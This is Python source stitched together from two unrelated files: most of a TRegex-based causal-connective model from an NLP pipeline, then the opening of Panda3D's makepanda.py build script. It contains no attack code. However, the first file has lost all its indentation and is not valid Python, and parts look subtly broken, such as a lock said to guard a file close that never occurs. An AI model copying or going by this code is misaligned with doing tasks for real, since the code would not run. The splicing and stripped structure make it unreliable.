pattern = '%s < (%s %s' % (pattern, node_pattern,
edge_pattern)
else: # back edge dominates
edge_pattern = TRegexConnectiveModel._get_dep_edge_pattern(
edge_end, edge_start, sentence)
# Paths with opposing arrows meeting at a single node mess up our
# scheme for edge patterns. (This happens particularly often with
# parse graphs that have been TSurgeoned.) Add these dependency
# labels as independent patterns, if necessary.
if pattern.endswith(']'):
pattern = '%s > (%s' % (pattern, node_pattern)
independent_pattern = ('~%s %s' %
(node_names[edge_end], edge_pattern))
else:
pattern = '%s %s > (%s' % (pattern, edge_pattern,
node_pattern)
return pattern, independent_pattern
@staticmethod
def _get_cons_node_pattern(sentence, node_index, node_names,
connective_nodes, steiner_nodes, cause_node,
effect_node):
tree = sentence.constituency_tree # for brevity
node = subtree_at_index(tree, node_index)
try:
connective_index = connective_nodes.index(node)
assert (isinstance(node[0][0], str)
or isinstance(node[0][0], unicode))
node_name = 'connective_%d' % connective_index
node_names[node_index] = node_name
gen_pos = Token.POS_GENERAL.get(node.label(), node.label())
return '(/^%s.*/=%s < %s)' % (gen_pos, node_name, node[0])
except ValueError: # It's not a connective node
try:
steiner_index = steiner_nodes.index(node_index)
node_name = 'steiner_%d' % steiner_index
pattern = '__=%s' % node_name
except ValueError: # It's an argument node_index
node_name = ['cause', 'effect'][node is effect_node]
pattern = '%s=%s' % (node.label(), node_name)
node_names[node_index] = node_name
return pattern
@staticmethod
def _add_cons_edge_to_pattern(sentence, steiner_graph, pattern,
node_pattern, edge_start, edge_end,
node_names):
# TODO: Make this use <+(VP) for VPs.
if steiner_graph[edge_start, edge_end]: # forward edge
pattern = '%s < (%s' % (pattern, node_pattern)
else: # back edge
pattern = '%s > (%s' % (pattern, node_pattern)
return pattern, ''
@staticmethod
def _generate_pattern_from_steiners(sentence, steiner_graph, steiner_nodes,
connective_nodes, cause, effect,
path_seed_index):
'''
Both dependency-based and constituency-based pattern generation share
the same algorithmic structure once the Steiner graph has been found.
The only difference is how patterns are generated for each node/edge.
If we're in dependency mode:
- `cause` and `effect` are the Tokens representing the argument heads.
- `connective_nodes` is a list of token indices.
If we're in constituency mode:
- `cause` and `effect` are constituency nodes spanning the argument
annotations.
- `connective_nodes` is a list of constituency tree nodes.
'''
if len(steiner_nodes) > FLAGS.tregex_max_steiners:
logging.debug(
"Ignoring very long pattern (sentence: %s)"
% sentence.original_text)
return (None, None)
pattern = ''
if FLAGS.tregex_pattern_type == 'dependency':
node_pattern_fn = TRegexConnectiveModel._get_dep_node_pattern
add_edge_fn = TRegexConnectiveModel._add_dep_edge_to_pattern
else:
node_pattern_fn = TRegexConnectiveModel._get_cons_node_pattern
add_edge_fn = TRegexConnectiveModel._add_cons_edge_to_pattern
# To generate the pattern, we start by generating one long string that
# can be checked easily by TRegex. That'll be the biggest chunk of the
# pattern. It consists of the longest path through the Steiner tree
# edges.
# Start the longest path search from a node we know is actually in the
# tree we're looking for.
longest_path = list(
longest_path_in_tree(steiner_graph, path_seed_index))
if FLAGS.tregex_pattern_type == 'dependency':
# Normalize the path so that we don't end up thinking the reverse
# path is a totally different pattern: always put the cause first.
try:
if (longest_path.index(cause.index) >
longest_path.index(effect.index)):
longest_path = longest_path[::-1]
except ValueError:
# TODO: Should we normalize in some other way if both args
# aren't in the longest path?
pass
# TODO: implement this for constituency?
node_names = {}
edges = [(None, longest_path[0])] + list(pairwise(longest_path))
independent_patterns = []
for edge_start, edge_end in edges:
end_node_pattern = node_pattern_fn(
sentence, edge_end, node_names, connective_nodes,
steiner_nodes, cause, effect)
if edge_start is not None:
pattern, independent_pattern = add_edge_fn(
sentence, steiner_graph, pattern, end_node_pattern,
edge_start, edge_end, node_names)
if independent_pattern:
independent_patterns.append(independent_pattern)
else: # start of path
pattern = '(%s' % end_node_pattern
pattern += ')' * len(edges)
# Next, we need to make sure all the edges that weren't included in the
# longest path get incorporated into the pattern. For this, it's OK to
# have a few colon-separated pattern segments (which slow TRegex down).
def get_named_node_pattern(node):
try:
return '=' + node_names[node]
except KeyError: # Node hasn't been named and given a pattern yet
return '(%s)' % node_pattern_fn(
sentence, node, node_names, connective_nodes,
steiner_nodes, cause, effect)
for edge_start, edge_end in zip(*steiner_graph.nonzero()):
if ((edge_start, edge_end) in edges
or (edge_end, edge_start) in edges):
continue
start_node_pattern = get_named_node_pattern(edge_start)
end_node_pattern = get_named_node_pattern(edge_end)
# Link end to start using add_edge_fn, as though start were the
# entire pattern so far. It will, in fact, be the entire pattern so
# far after the colon.
edge_pattern, independent_pattern = add_edge_fn(
sentence, steiner_graph, start_node_pattern, end_node_pattern,
edge_start, edge_end, node_names)
if independent_pattern:
independent_patterns.append(independent_pattern)
# The final paren is because the edge pattern functions don't close
# their parens.
pattern = '%s : (%s))' % (pattern, edge_pattern)
# Add fragments of pattern that couldn't be embedded in edge patterns.
for pattern_frag in independent_patterns:
logging.debug('Adding fragment %s to %s', pattern_frag, pattern)
pattern = '%s : (%s)' % (pattern, pattern_frag)
# All connective node IDs should be printed by TRegex.
node_names_to_print = [name for name in node_names.values()
if name.startswith('connective')]
if FLAGS.tregex_pattern_type == 'dependency':
# Fix cases where the head of an argument is already in the
# connective. The pattern generation will always prefer to name the
# node as a connective. Now, we generate a bit of additional pattern
# that specifies that the relevant argument head has the same name.
for arg, arg_name in [(cause, 'cause'), (effect, 'effect')]:
if arg.index in connective_nodes:
# Speed up search for arg node by requiring a POS/edge child
pattern = ('%s : (__=%s == =%s)'
% (pattern, arg_name, node_names[arg.index]))
# Prevent patterns from matching if cause and effect are identical.
# These are always spurious matches.
pattern += " : (=effect !== =cause)"
return pattern, node_names_to_print
@staticmethod
def _get_dependency_pattern(sentence, connective_tokens, cause_tokens,
effect_tokens):
connective_indices = [token.index for token in connective_tokens]
cause_head = sentence.get_head(cause_tokens)
effect_head = sentence.get_head(effect_tokens)
required_token_indices = list(set( # Eliminate potential duplicates
[cause_head.index, effect_head.index] + connective_indices))
# Once the sentence has been preprocessed, it is possible some nodes
# will have been deleted. We make sure to delete these from the list
# of required nodes. (We check whether each has an incoming or outgoing
# edge.)
# TODO: remember what nodes have been deleted, so that they can be
# re-added as part of the connective_tokens span if the pattern
# matches.
required_token_indices_to_keep = []
for required_index in required_token_indices:
if (sentence.edge_graph[:, required_index].nnz != 0
or sentence.edge_graph[required_index, :].nnz != 0):
required_token_indices_to_keep.append(required_index)
else:
logging.debug("Eliminating token %s from pattern"
% sentence.tokens[required_index])
required_token_indices = required_token_indices_to_keep
steiner_nodes, steiner_graph = steiner_tree(
sentence.edge_graph, required_token_indices,
sentence.path_costs, sentence.path_predecessors)
path_seed_index = connective_indices[0]
return TRegexConnectiveModel._generate_pattern_from_steiners(
sentence, steiner_graph, steiner_nodes, connective_indices,
cause_head, effect_head, path_seed_index)
@staticmethod
def _get_constituency_pattern(sentence, connective_tokens, cause_tokens,
effect_tokens):
# TODO: optimize shortest-path calculations on graph to be done only
# once? (currently happen repeatedly in steiner_tree)
constituency_tree = sentence.constituency_tree # for brevity
cause_node = sentence.get_constituency_node_for_tokens(cause_tokens)
effect_node = sentence.get_constituency_node_for_tokens(effect_tokens)
connective_treepositions = [
# Index includes ROOT token, so subtract 1.
constituency_tree.leaf_treeposition(t.index - 1)
for t in connective_tokens]
# Leaf treepositions get us to the words themselves. We want the nodes
# just above the words, so we lop off the ends of the positions.
connective_nodes = [constituency_tree[position[:-1]]
for position in connective_treepositions]
# Use IDs of terminal nodes so we can do quick checks for identity,
# rather than expensive recursive equality checks.
terminal_ids = [id(terminal) for terminal
in [cause_node, effect_node] + connective_nodes]
terminal_indices = [
i for (i, subtree) in enumerate(constituency_tree.subtrees())
if id(subtree) in terminal_ids]
steiner_nodes, steiner_graph = steiner_tree(
sentence.constituency_graph, terminal_indices, directed=False)
path_seed_index = index_of_subtree(connective_nodes[0])
return TRegexConnectiveModel._generate_pattern_from_steiners(
sentence, steiner_graph, steiner_nodes, connective_nodes,
cause_node, effect_node, path_seed_index)
@staticmethod
def _get_pattern(sentence, connective_tokens, cause_tokens, effect_tokens):
if FLAGS.tregex_pattern_type == 'dependency':
return TRegexConnectiveModel._get_dependency_pattern(
sentence, connective_tokens, cause_tokens, effect_tokens)
else:
return TRegexConnectiveModel._get_constituency_pattern(
sentence, connective_tokens, cause_tokens, effect_tokens)
def _extract_patterns(self, sentences):
# TODO: Extend this to work with cases of missing arguments.
self.tregex_patterns = []
patterns_seen = set()
preprocessed_ptb_strings = self._preprocess_sentences(sentences)
logging.info('Extracting patterns...')
if FLAGS.print_patterns:
print 'Patterns:'
for sentence, ptb_string in zip(sentences, preprocessed_ptb_strings):
if FLAGS.tregex_pattern_type == 'dependency':
sentence = sentence.substitute_dep_ptb_graph(ptb_string)
for instance in sentence.causation_instances:
                if instance.cause is not None and instance.effect is not None:
pattern, node_names = self._get_pattern(
sentence, instance.connective, instance.cause,
instance.effect)
if pattern is None:
continue
if pattern not in patterns_seen:
if FLAGS.print_patterns:
print ' ', pattern.encode('utf-8')
print ' Sentence:', (sentence.original_text.encode(
'utf-8'))
print
patterns_seen.add(pattern)
connective_lemmas = [t.lemma for t
in instance.connective]
self.tregex_patterns.append((pattern, node_names,
connective_lemmas))
sys.stdout.flush()
logging.info('Done extracting patterns.')
return preprocessed_ptb_strings
#####################################
# Running TRegex
#####################################
class TregexProcessorThread(threading.Thread):
def __init__(self, sentences, ptb_strings, queue, predicted_outputs,
*args, **kwargs):
super(TRegexConnectiveModel.TregexProcessorThread, self).__init__(
*args, **kwargs)
self.sentences = sentences
self.ptb_strings = ptb_strings
self.queue = queue
self.predicted_outputs = predicted_outputs
self.output_file = None
self.total_bytes_output = 0
# We associate a lock with the output file to prevent concurrency
# errors where progress reporting calls tell() at the same time as
# the main thread closes the file.
self.file_lock = Lock()
dev_null = open('/dev/null', 'w')
def run(self):
try:
while(True):
(pattern, connective_labels, possible_sentence_indices,
connective_lemmas) = self.queue.get_nowait()
if not possible_sentence_indices: # no sentences to scan
self.queue.task_done()
continue
possible_trees = [self.ptb_strings[i]
for i in possible_sentence_indices]
possible_sentences = [(i, self.sentences[i])
for i in possible_sentence_indices]
with tempfile.NamedTemporaryFile(
'w', prefix='trees') as tree_file:
# logging.debug("Trees written to %s (pattern: %s)"
# % (tree_file.name, pattern))
tree_file.writelines(possible_trees)
# Make sure the file is synced for threads to access
tree_file.flush()
self._process_pattern(
pattern, connective_labels, connective_lemmas,
possible_sentences, tree_file.name)
self.queue.task_done()
except Queue.Empty: # no more items in queue
return
_FIXED_TREGEX_ARGS = '-o -l -N -h cause -h effect'.split()
def _run_tregex(self, pattern, connective_labels, tree_file_path):
logging.debug("Processing %s to %s"
% (pattern, self.output_file.name))
if FLAGS.tregex_pattern_type == 'dependency':
output_type_arg = '-u'
else:
output_type_arg = '-x'
connective_printing_args = []
for connective_label in connective_labels:
connective_printing_args.extend(['-h', connective_label])
tregex_command = (
[path.join(FLAGS.tregex_dir, 'tregex.sh'), output_type_arg]
+ self._FIXED_TREGEX_ARGS + connective_printing_args
+ [pattern, tree_file_path])
devnull = TRegexConnectiveModel.TregexProcessorThread.dev_null
retcode = subprocess.call(tregex_command, stdout=self.output_file,
stderr=devnull) # Edit to debug problems
if retcode != 0:
raise RuntimeError("TRegex command failed: %s" % tregex_command)
        _TREGEX_CACHE_DIR = path.expanduser("~/tregex_cache")
def _create_output_file_if_not_exists(self, pattern, connective_labels,
tree_file_path):
pattern_dir_name = pattern.replace('/', '\\')
if len(pattern_dir_name) > FLAGS.tregex_max_cache_filename_len:
# The combination of the start of the pattern plus the hash
# should be very hard indeed to accidentally match.
pattern_hash = hash(pattern_dir_name)
# Leave room for up to 20 characters of numerical hash (the max
# we could get on a 64-bit system).
pattern_dir_name = pattern_dir_name[:FLAGS.tregex_max_cache_filename_len - 20]
pattern_dir_name += str(pattern_hash)
file_hash = hash_file(tree_file_path)
cache_dir_name = path.join(self._TREGEX_CACHE_DIR, pattern_dir_name)
cache_file_name = path.join(cache_dir_name, file_hash)
try:
self.output_file = open(cache_file_name, 'rb')
except IOError: # No such file
try:
os.makedirs(cache_dir_name)
except OSError:
if not path.isdir(cache_dir_name):
raise
self.output_file = open(cache_file_name, 'w+b')
self._run_tregex(pattern, connective_labels, tree_file_path)
self.output_file.seek(0)
def _process_pattern(self, pattern, connective_labels,
connective_lemmas, possible_sentences,
tree_file_path):
self._create_output_file_if_not_exists(pattern, connective_labels,
tree_file_path)
with self.output_file:
for sentence_index, sentence in possible_sentences:
possible_causations = self._process_tregex_for_sentence(
pattern, connective_labels, connective_lemmas, sentence)
# NOTE: This is the ONLY PLACE where we modify shared data.
# It is thread-safe because self.predicted_outputs itself is
# never modified; its individual elements -- themselves
# lists -- are never replaced; and list.extend() is atomic.
self.predicted_outputs[sentence_index].extend(
possible_causations)
# Tell the progress reporter how far we've gotten, so that it
# will know progress for patterns that have already finished.
self.total_bytes_output += self.output_file.tell()
# Lock the file lock as we close the file
self.file_lock.acquire()
# Now release the lock once the file is closed
self.file_lock.release()
self.output_file = None
@staticmethod
def _get_constituency_token_from_tregex_line(line, sentence,
all_treepositions):
# We need to use treepositions, not subtrees, because this
# is how TRegex gives match positions.
treeposition_index = int(line.split(":")[1])
node = sentence.constituency_tree[
all_treepositions[treeposition_index - 1]]
head = sentence.constituent_heads[node]
return sentence.get_token_for_constituency_node(head)
@staticmethod
def _get_dependency_token_from_tregex_line(line, sentence):
token_index = int(line.split("_")[-1])
return sentence.tokens[token_index]
def _process_tregex_for_sentence(self, pattern, connective_labels,
connective_lemmas, sentence):
# Read TRegex output for the sentence.
# For each sentence, we leave the file positioned at the next
# tree number line.
self.output_file.readline() # skip tree num line
next_line = self.output_file.readline().strip()
lines = []
while next_line:
lines.append(next_line)
next_line = self.output_file.readline().strip()
true_connectives = {
tuple(instance.connective): instance
for instance in sentence.causation_instances
if instance.cause and instance.effect # limit to pairwise
}
# Parse TRegex output. Argument and connective identifiers will be
# printed in batches of 2 + k, where k is the connective length.
# The first two printed will be cause/effect; the remainder are
# connectives.
batch_size = 2 + len(connective_labels)
possible_causations = []
for match_lines in igroup(lines, batch_size):
# TODO: If the argument heads overlap, we can't match the
# pattern. This is extremely rare, but it's not clear how to
# deal with it when it does happen.
if None in match_lines:
logging.warn(
"Skipping invalid TRegex match: %s (pattern: %s)",
lines, pattern)
continue
arg_lines = match_lines[:2]
connective_lines = match_lines[2:]
if FLAGS.tregex_pattern_type == 'dependency':
cause, effect = [
self._get_dependency_token_from_tregex_line(line,
sentence)
for line in arg_lines]
connective = [
self._get_dependency_token_from_tregex_line(line,
sentence)
for line in connective_lines]
else: # constituency
all_treepositions = (sentence.constituency_tree
.treepositions())
cause, effect = [
self._get_constituency_token_from_tregex_line(
line, sentence, all_treepositions)
for line in arg_lines]
connective = [
self._get_constituency_token_from_tregex_line(
line, sentence, all_treepositions)
for line in connective_lines]
connective.sort( # Ensure connective order is always consistent
key=lambda token: connective_lemmas.index(token.lemma))
# TODO: Make this eliminate duplicate PossibleCausations on
# the same connective words, like regex pipeline does.
possible = PossibleCausation(
sentence, [pattern], connective,
true_connectives.get(tuple(connective), None),
[cause], [effect])
possible_causations.append(possible)
'''
# Debugging code to search for specific matches
if [t.lemma for t in connective] == ['help']:
print "Match:", possible
print "Sentence:", sentence.original_text.encode('utf8')
print "Pattern:", pattern
print
'''
return possible_causations
def get_progress(self):
try:
with self.file_lock:
progress = self.total_bytes_output + self.output_file.tell()
return progress
except (AttributeError, IOError, ValueError):
# AttributeError indicates that self.output_file was None.
# IOError/ValueError indicate that we managed to ask for file
# size just after the file was closed. Either way, that means
# that now the total number of bytes has been recorded.
return self.total_bytes_output
@staticmethod
def _make_progress_reporter(threads, total_estimated_bytes,
all_threads_done):
def report_progress_loop():
while(True):
time.sleep(4)
if all_threads_done[0]:
return
bytes_output = sum([t.get_progress() for t in threads])
# Never allow > 99% completion as long as we're still running.
# (This can happen if our estimated max sizes turn out to be
# off.)
try:
progress = min(
bytes_output / float(total_estimated_bytes), 0.99)
except ZeroDivisionError:
progress = 0
if not all_threads_done[0]: # Make sure we're still going
logging.info("Tagging connectives: %1.0f%% complete"
% (progress * 100))
else:
break
progress_reporter = threading.Thread(target=report_progress_loop)
progress_reporter.daemon = True
return progress_reporter
class TRegexConnectiveStage(Stage):
def __init__(self, name):
super(TRegexConnectiveStage, self).__init__(
name=name, model=TRegexConnectiveModel())
self.pairwise_only_metrics = None # used during evaluation
produced_attributes = ['possible_causations']
def _make_evaluator(self):
return PairwiseAndNonIAAEvaluator(False, False,
FLAGS.patterns_print_test_instances,
True, 'possible_causations', False)
# No need for _label_instance, as we take care of that in _test_documents.
def __deduplicate(self, sentence_pcs):
pc_tuples_to_pcs = {}
for pc in sentence_pcs:
pc_tuple = get_causation_tuple(pc.connective, pc.cause[0],
pc.effect[0])
previous_pc = pc_tuples_to_pcs.get(pc_tuple, None)
if previous_pc is None:
pc_tuples_to_pcs[pc_tuple] = pc
else:
# print "Duplicate found:", pc
previous_pc.matching_patterns.append(pc.matching_patterns[0])
sentence_pcs = pc_tuples_to_pcs.values()
sentence_pcs.sort(key=lambda pc: pc.connective[0].index)
return sentence_pcs
def _test_documents(self, documents, sentences_by_doc, writer):
all_sentences = list(itertools.chain(*sentences_by_doc))
all_possible_causations = self.model.test(all_sentences)
causations_iter = iter(all_possible_causations)
for document, doc_sentences in zip(documents, sentences_by_doc):
for sentence in doc_sentences:
sentence.possible_causations = self.__deduplicate(
causations_iter.next())
if writer:
writer.instance_complete(document, sentence)
try:
causations_iter.next()
assert False, "Should have as many causation lists as sentences!"
except StopIteration:
pass
|
makepanda.py
|
#!/usr/bin/env python
########################################################################
#
# To build panda using this script, type 'makepanda.py' on unix
# or 'makepanda.bat' on windows, and examine the help-text.
# Then run the script again with the appropriate options to compile
# panda3d.
#
########################################################################
try:
import sys, os, platform, time, stat, re, getopt, threading, signal, shutil
if sys.platform == "darwin" or sys.version_info >= (2, 6):
import plistlib
if sys.version_info >= (3, 0):
import queue
else:
import Queue as queue
except:
print("You are either using an incomplete or an old version of Python!")
print("Please install the development package of Python 2.x and try again.")
exit(1)
from makepandacore import *
from installpanda import *
import time
import os
import sys
########################################################################
##
## PARSING THE COMMAND LINE OPTIONS
##
## You might be tempted to change the defaults by editing them
## here. Don't do it. Instead, create a script that compiles
## panda with your preferred options. Or, create
## a 'makepandaPreferences' file and put it into your python path.
##
########################################################################
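# A minimal wrapper in the spirit of the advice above (hypothetical file name
# and option set; adjust to taste) keeps preferred defaults out of this script:
#
#   #!/usr/bin/env python
#   # mymakepanda.py -- build Panda3D with my usual options
#   import subprocess, sys
#   sys.exit(subprocess.call([sys.executable, "makepanda.py",
#                             "--everything", "--threads=4"] + sys.argv[1:]))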
COMPILER=0
INSTALLER=0
WHEEL=0
RUNTESTS=0
GENMAN=0
COMPRESSOR="zlib"
THREADCOUNT=0
CFLAGS=""
CXXFLAGS=""
LDFLAGS=""
RTDIST=0
RTDIST_VERSION=None
RUNTIME=0
DISTRIBUTOR=""
VERSION=None
DEBVERSION=None
WHLVERSION=None
RPMRELEASE="1"
GIT_COMMIT=None
P3DSUFFIX=None
MAJOR_VERSION=None
COREAPI_VERSION=None
PLUGIN_VERSION=None
OSXTARGET=None
OSX_ARCHS=[]
HOST_URL=None
global STRDXSDKVERSION, BOOUSEINTELCOMPILER
STRDXSDKVERSION = 'default'
WINDOWS_SDK = None
MSVC_VERSION = None
BOOUSEINTELCOMPILER = False
OPENCV_VER_23 = False
if "MACOSX_DEPLOYMENT_TARGET" in os.environ:
OSXTARGET=os.environ["MACOSX_DEPLOYMENT_TARGET"]
PkgListSet(["PYTHON", "DIRECT", # Python support
"GL", "GLES", "GLES2"] + DXVERSIONS + ["TINYDISPLAY", "NVIDIACG", # 3D graphics
"EGL", # OpenGL (ES) integration
"EIGEN", # Linear algebra acceleration
"OPENAL", "FMODEX", # Audio playback
"VORBIS", "OPUS", "FFMPEG", "SWSCALE", "SWRESAMPLE", # Audio decoding
"ODE", "PHYSX", "BULLET", "PANDAPHYSICS", # Physics
"SPEEDTREE", # SpeedTree
"ZLIB", "PNG", "JPEG", "TIFF", "OPENEXR", "SQUISH", # 2D Formats support
] + MAYAVERSIONS + MAXVERSIONS + [ "FCOLLADA", "ASSIMP", "EGG", # 3D Formats support
"FREETYPE", "HARFBUZZ", # Text rendering
"VRPN", "OPENSSL", # Transport
"FFTW", # Algorithm helpers
"ARTOOLKIT", "OPENCV", "DIRECTCAM", "VISION", # Augmented Reality
"GTK2", # GTK2 is used for PStats on Unix
"MFC", "WX", "FLTK", # Used for web plug-in only
"ROCKET", "AWESOMIUM", # GUI libraries
"CARBON", "COCOA", # Mac OS X toolkits
"X11", # Unix platform support
"PANDATOOL", "PVIEW", "DEPLOYTOOLS", # Toolchain
"SKEL", # Example SKEL project
"PANDAFX", # Some distortion special lenses
"PANDAPARTICLESYSTEM", # Built in particle system
"CONTRIB", # Experimental
"SSE2", "NEON", # Compiler features
])
CheckPandaSourceTree()
def keyboardInterruptHandler(x,y):
exit("keyboard interrupt")
signal.signal(signal.SIGINT, keyboardInterruptHandler)
########################################################################
##
## Command-line parser.
##
## You can type "makepanda --help" to see all the options.
##
########################################################################
def usage(problem):
if (problem):
print("")
print("Error parsing command-line input: %s" % (problem))
print("")
print("Makepanda generates a 'built' subdirectory containing a")
print("compiled copy of Panda3D. Command-line arguments are:")
print("")
print(" --help (print the help message you're reading now)")
print(" --verbose (print out more information)")
print(" --runtime (build a runtime build instead of an SDK build)")
print(" --tests (run the test suite)")
print(" --installer (build an installer)")
print(" --wheel (build a pip-installable .whl)")
print(" --optimize X (optimization level can be 1,2,3,4)")
print(" --version X (set the panda version number)")
print(" --lzma (use lzma compression when building Windows installer)")
print(" --distributor X (short string identifying the distributor of the build)")
print(" --outputdir X (use the specified directory instead of 'built')")
print(" --host URL (set the host url (runtime build only))")
print(" --threads N (use the multithreaded build system. see manual)")
print(" --osxtarget N (the OS X version number to build for (OS X only))")
print(" --universal (build universal binaries (OS X only))")
print(" --override \"O=V\" (override dtool_config/prc option value)")
print(" --static (builds libraries for static linking)")
print(" --target X (experimental cross-compilation (android only))")
print(" --arch X (target architecture for cross-compilation)")
print("")
for pkg in PkgListGet():
p = pkg.lower()
print(" --use-%-9s --no-%-9s (enable/disable use of %s)"%(p, p, pkg))
if sys.platform != 'win32':
print(" --<PKG>-incdir (custom location for header files of thirdparty package)")
print(" --<PKG>-libdir (custom location for library files of thirdparty package)")
print("")
print(" --nothing (disable every third-party lib)")
print(" --everything (enable every third-party lib)")
print(" --directx-sdk=X (specify version of DirectX SDK to use: jun2010, aug2009, mar2009, aug2006)")
print(" --windows-sdk=X (specify Windows SDK version, eg. 7.0, 7.1 or 10. Default is 7.1)")
print(" --msvc-version=X (specify Visual C++ version, eg. 10, 11, 12, 14. Default is 14)")
print(" --use-icl (experimental setting to use an intel compiler instead of MSVC on Windows)")
print("")
print("The simplest way to compile panda is to just type:")
print("")
print(" makepanda --everything")
print("")
os._exit(1)
def parseopts(args):
global INSTALLER,WHEEL,RUNTESTS,RTDIST,RUNTIME,GENMAN,DISTRIBUTOR,VERSION
global COMPRESSOR,THREADCOUNT,OSXTARGET,OSX_ARCHS,HOST_URL
global DEBVERSION,WHLVERSION,RPMRELEASE,GIT_COMMIT,P3DSUFFIX,RTDIST_VERSION
global STRDXSDKVERSION, WINDOWS_SDK, MSVC_VERSION, BOOUSEINTELCOMPILER
longopts = [
"help","distributor=","verbose","runtime","osxtarget=","tests",
"optimize=","everything","nothing","installer","wheel","rtdist","nocolor",
"version=","lzma","no-python","threads=","outputdir=","override=",
"static","host=","debversion=","rpmrelease=","p3dsuffix=","rtdist-version=",
"directx-sdk=", "windows-sdk=", "msvc-version=", "clean", "use-icl",
"universal", "target=", "arch=", "git-commit=", "no-directscripts",
"use-touchinput", "no-touchinput"]
anything = 0
optimize = ""
target = None
target_arch = None
universal = False
clean_build = False
for pkg in PkgListGet():
longopts.append("use-" + pkg.lower())
longopts.append("no-" + pkg.lower())
longopts.append(pkg.lower() + "-incdir=")
longopts.append(pkg.lower() + "-libdir=")
try:
opts, extras = getopt.getopt(args, "", longopts)
for option, value in opts:
if (option=="--help"): raise Exception
elif (option=="--optimize"): optimize=value
elif (option=="--installer"): INSTALLER=1
elif (option=="--tests"): RUNTESTS=1
elif (option=="--wheel"): WHEEL=1
elif (option=="--verbose"): SetVerbose(True)
elif (option=="--distributor"): DISTRIBUTOR=value
elif (option=="--rtdist"): RTDIST=1
elif (option=="--runtime"): RUNTIME=1
elif (option=="--genman"): GENMAN=1
elif (option=="--everything"): PkgEnableAll()
elif (option=="--nothing"): PkgDisableAll()
elif (option=="--threads"): THREADCOUNT=int(value)
elif (option=="--outputdir"): SetOutputDir(value.strip())
elif (option=="--osxtarget"): OSXTARGET=value.strip()
elif (option=="--universal"): universal = True
elif (option=="--target"): target = value.strip()
elif (option=="--arch"): target_arch = value.strip()
elif (option=="--nocolor"): DisableColors()
elif (option=="--version"):
match = re.match(r'^\d+\.\d+\.\d+', value)
if not match:
usage("version requires three digits")
WHLVERSION = value
VERSION = match.group()
elif (option=="--lzma"): COMPRESSOR="lzma"
elif (option=="--override"): AddOverride(value.strip())
elif (option=="--static"): SetLinkAllStatic(True)
elif (option=="--host"): HOST_URL=value
elif (option=="--debversion"): DEBVERSION=value
elif (option=="--rpmrelease"): RPMRELEASE=value
elif (option=="--git-commit"): GIT_COMMIT=value
elif (option=="--p3dsuffix"): P3DSUFFIX=value
elif (option=="--rtdist-version"): RTDIST_VERSION=value
# Backward compatibility, OPENGL was renamed to GL
elif (option=="--use-opengl"): PkgEnable("GL")
elif (option=="--no-opengl"): PkgDisable("GL")
elif (option=="--no-directscripts"): pass
elif (option=="--directx-sdk"):
STRDXSDKVERSION = value.strip().lower()
if STRDXSDKVERSION == '':
print("No DirectX SDK version specified. Using 'default' DirectX SDK search")
STRDXSDKVERSION = 'default'
elif (option=="--windows-sdk"):
WINDOWS_SDK = value.strip().lower()
elif (option=="--msvc-version"):
MSVC_VERSION = value.strip().lower()
elif (option=="--use-icl"): BOOUSEINTELCOMPILER = True
elif (option=="--clean"): clean_build = True
else:
for pkg in PkgListGet():
if option == "--use-" + pkg.lower():
PkgEnable(pkg)
break
elif option == "--no-" + pkg.lower():
PkgDisable(pkg)
break
elif option == "--" + pkg.lower() + "-incdir":
PkgSetCustomLocation(pkg)
IncDirectory(pkg, value)
break
elif option == "--" + pkg.lower() + "-libdir":
PkgSetCustomLocation(pkg)
LibDirectory(pkg, value)
break
if (option == "--everything" or option.startswith("--use-")
or option == "--nothing" or option.startswith("--no-")):
anything = 1
except:
usage(sys.exc_info()[1])
if not anything:
if RUNTIME:
PkgEnableAll()
else:
usage("You should specify a list of packages to use or --everything to enable all packages.")
if (RTDIST and RUNTIME):
usage("Options --runtime and --rtdist cannot be specified at the same time!")
if (optimize=="" and (RTDIST or RUNTIME)): optimize = "4"
elif (optimize==""): optimize = "3"
if OSXTARGET:
try:
maj, min = OSXTARGET.strip().split('.')
OSXTARGET = int(maj), int(min)
assert OSXTARGET[0] == 10
except:
usage("Invalid setting for OSXTARGET")
else:
OSXTARGET = None
if target is not None or target_arch is not None:
SetTarget(target, target_arch)
if universal:
if target_arch:
exit("--universal is incompatible with --arch")
OSX_ARCHS.append("i386")
if OSXTARGET:
osxver = OSXTARGET
else:
maj, min = platform.mac_ver()[0].split('.')[:2]
osxver = int(maj), int(min)
if osxver[1] < 6:
OSX_ARCHS.append("ppc")
else:
OSX_ARCHS.append("x86_64")
elif HasTargetArch():
OSX_ARCHS.append(GetTargetArch())
try:
SetOptimize(int(optimize))
assert GetOptimize() in [1, 2, 3, 4]
except:
usage("Invalid setting for OPTIMIZE")
if GIT_COMMIT is not None and not re.match("^[a-f0-9]{40}$", GIT_COMMIT):
usage("Invalid SHA-1 hash given for --git-commit option!")
if GetTarget() == 'windows':
if not MSVC_VERSION:
print("No MSVC version specified. Defaulting to 14 (Visual Studio 2015).")
MSVC_VERSION = (14, 0)
else:
try:
MSVC_VERSION = tuple(int(d) for d in MSVC_VERSION.split('.'))[:2]
if (len(MSVC_VERSION) == 1):
MSVC_VERSION += (0,)
except:
usage("Invalid setting for --msvc-version")
if MSVC_VERSION < (14, 0):
warn_prefix = "%sERROR:%s " % (GetColor("red"), GetColor())
print("=========================================================================")
print(warn_prefix + "Support for MSVC versions before 2015 has been discontinued.")
print(warn_prefix + "For more information, or any questions, please visit:")
print(warn_prefix + " https://github.com/panda3d/panda3d/issues/288")
print("=========================================================================")
sys.stdout.flush()
time.sleep(1.0)
sys.exit(1)
if not WINDOWS_SDK:
print("No Windows SDK version specified. Defaulting to '7.1'.")
WINDOWS_SDK = '7.1'
if clean_build and os.path.isdir(GetOutputDir()):
print("Deleting %s" % (GetOutputDir()))
shutil.rmtree(GetOutputDir())
parseopts(sys.argv[1:])
########################################################################
##
## Handle environment variables.
##
########################################################################
if ("CFLAGS" in os.environ):
CFLAGS = os.environ["CFLAGS"].strip()
if ("CXXFLAGS" in os.environ):
CXXFLAGS = os.environ["CXXFLAGS"].strip()
if ("RPM_OPT_FLAGS" in os.environ):
CFLAGS += " " + os.environ["RPM_OPT_FLAGS"].strip()
CXXFLAGS += " " + os.environ["RPM_OPT_FLAGS"].strip()
if ("LDFLAGS" in os.environ):
LDFLAGS = os.environ["LDFLAGS"].strip()
os.environ["MAKEPANDA"] = os.path.abspath(sys.argv[0])
if GetHost() == "darwin" and OSXTARGET is not None:
os.environ["MACOSX_DEPLOYMENT_TARGET"] = "%d.%d" % OSXTARGET
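# Illustration (hypothetical values): invoking the build as
#   CFLAGS="-march=native" RPM_OPT_FLAGS="-g -O2" python makepanda.py --everything
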